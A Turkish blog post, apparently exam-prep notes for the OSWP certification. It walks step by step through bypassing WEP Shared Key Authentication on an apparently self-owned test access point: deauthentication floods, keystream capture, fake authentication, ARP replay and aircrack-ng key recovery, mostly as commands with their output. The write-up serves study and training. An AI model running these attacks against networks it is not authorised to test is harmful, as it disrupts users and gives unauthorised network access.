OSWP sınavına hazırlanırken hiç bilmeyenler için kaynak üretmeye çalışıyorum bazen konuları fazla hızlı anlatıyorum ya da anlatmıyorum çünkü eskimiş teknolojiler oluyor. Mesela shared key gibi... Vaktim vardı bir kaç günede sınava gireceğim yazayim dedim...
Open Authentication'u biliyoruz. Adının hakkını veriyor çünkü gerçekten hiç bir doğrulama mekanizması olmadan AP ile iletişime geçebilecek duruma geliyoruz. Buda bize WEP ve Open authentication ile konfigüre edilmiş bir network'te kolayca paket injection yapabilme fırsatı veriyor.
Shared Key, hikayenin tam da bu kısmında devreye girmektedir. Sizi AP ile konuşturmadan önce doğrulamaya çalışır. Size bir challange request gönderir sizde bu geen bu request'teki veriyi doğru key ile şifreleyip cevap dönersiniz. Eğer AP bunu doğrularsa sizinle konuşmaya başlar. Çok güzel görünüyor değil mi? Ama yine çok kolay bir şekilde bypass edebiliriz.
Shared Key ile konfigüre edilmiş bir ağda ilk başta fake authetication saldırısı yapmaya deneyelim. Aşağıdakine benzer bir çıktı alırız.
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# airodump-ng wlan0 --bssid 7A:2B:C1:63:BD:64 -c 1 -w shared
10:59:10 Created capture file "shared-01.cap".
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -1 0 -e Huawei_HG655d -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0
11:00:45 Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
11:00:45 Sending Authentication Request (Open System) [ACK]
11:00:45 Switching to shared key authentication
^Cad 25 packets....
Şimdi bir Deauthetication saldırısı yapalım ve bu esnada airodump-ng ile dinleme işlemi gerçekleştirelim. Network içerisindeki bir client tekrar ağa bağlandığında ondan XOR dosyasını elde edeceğiz ve bu dosya aracılığı ile challenge reqeste response oluşturabileceğiz.
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0
11:04:38 Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:04:39 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:39 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:40 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:40 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:41 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:41 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:42 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:43 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:43 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:44 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# ls
shared-01-7A-2B-C1-63-BD-64.xor shared-01.csv shared-01.kismet.netxml
shared-01.cap shared-01.kismet.csv shared-01.log.csv
Yukarıda görüldüğü üzere .xor dosyası elde edildi. Şimdi bu dosya aracılığı ile fake authentication saldırısı yapalım.
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -1 600 -e Huawei_HG655d -y shared-01-7A-2B-C1-63-BD-64.xor -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0
The interface MAC (96:B5:61:AD:E1:1A) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 3A:BD:12:90:30:0D
11:07:15 Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
11:07:15 Sending Authentication Request (Shared Key)
11:07:17 Sending Authentication Request (Shared Key) [ACK]
11:07:17 Authentication 1/2 successful
11:07:17 Sending encrypted challenge. [ACK]
11:07:17 Authentication 2/2 successful
11:07:17 Sending Association Request [ACK]
11:07:17 Association successful :-) (AID: 1)
...
Harika! Artık sırada ARP-REPLAY ve aircrak-ng var. Arp-replay yaparken kolaylık açısından birde deauthentication saldırısı gerçekleştirirsek daha hızlı bir şekilde arp paketi yakalayabiliriz.
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -3 -b 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0 130 ⨯
The interface MAC (96:B5:61:AD:E1:1A) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 3A:BD:12:90:30:0D
11:09:10 Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
Saving ARP requests in replay_arp-0512-110910.cap
You should also start airodump-ng to capture replies.
^Cad 114438 packets (got 37470 ARP requests and 21755 ACKs), sent 33309 packets...(499 pps)
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0
11:09:13 Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:09:13 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:14 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:14 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:15 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:15 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:16 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:16 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:17 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:17 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:18 Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
CH 1 ][ Elapsed: 6 mins ][ 2021-05-12 11:11 ][ interface wlan0 down
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
7A:2B:C1:63:BD:64 -38 100 3424 22693 0 1 54e. WEP WEP SKA Huawei_HG655d
BSSID STATION PWR Rate Lost Frames Notes Probes
7A:2B:C1:63:BD:64 18:28:61:28:F8:70 -18 54e-54e 0 13447
7A:2B:C1:63:BD:64 3A:BD:12:90:30:0D -38 0 - 1 0 65725
Quitting...
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aircrack-ng shared-01.cap
Reading packets, please wait...
Opening shared-01.cap
Read 188762 packets.
Got 22697 out of 20000 IVsStarting PTW attack with 22697 ivs.
# BSSID ESSID Encryption
1 7A:2B:C1:63:BD:64 Huawei_HG655d WEP (22697 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening shared-01.cap
Read 188762 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Aircrack-ng 1.6
[00:00:01] Tested 71432 keys (got 22393 IVs)
KB depth byte(vote)
0 0/ 1 00(36352) C8(28928) E3(27904) BA(27648) 0A(27392) B8(27392) 61(26880) 8D(26880)
1 14/ 16 D9(26368) 00(26112) 16(26112) 9F(26112) FC(26112) 30(25856) 48(25856) 79(25856)
2 0/ 2 00(32768) FB(28416) 56(28160) 97(27904) B2(27904) F6(27904) 81(27648) 20(27392)
3 2/ 58 00(28160) D2(28160) CA(27904) 19(27904) 01(27648) 3A(27392) 4A(27392) 56(27392)
4 8/ 41 00(26880) 04(26624) 1E(26624) CF(26368) FA(26112) 69(26112) 85(26112) C8(26112)
KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )
Decrypted correctly: 100%
Ağın parolası:0000000000'muş...
İlk Yorumu Siz Yapın